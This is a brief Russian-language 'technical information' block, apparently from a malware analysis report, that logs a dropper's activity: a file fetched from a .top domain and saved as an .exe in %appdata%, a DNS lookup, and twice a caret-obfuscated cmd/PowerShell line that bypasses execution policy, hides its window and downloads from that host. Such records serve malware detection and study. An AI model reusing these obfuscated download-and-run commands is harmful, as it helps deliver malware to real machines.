Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OWERShEll^.eX^e ^-^ExecU^t^IoN^pO^LicY b^ypA^SS^ -N^OP^r^O^FIlE ^-W^iN^DOwstYlE hId^d^e^n^ ^(nEw-o^b^j^eC^t^ ^S^YS^t^em.^n^et.W^eb^cli^enT)^.DOwNlOAD^FIle('http://www.fopeioaas....
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /c "P^OWERShEll^.eX^e ^-^ExecU^t^IoN^pO^LicY b^ypA^SS^ -N^OP^r^O^FIlE ^-W^iN^DOwstYlE hId^d^e^n^ ^(nEw-o^b^j^eC^t^ ^S^YS^t^em.^n^et.W^eb^cli^enT)^.DOwNlOAD^FIle('http://www.fopeioaas....' (со скрытым окном)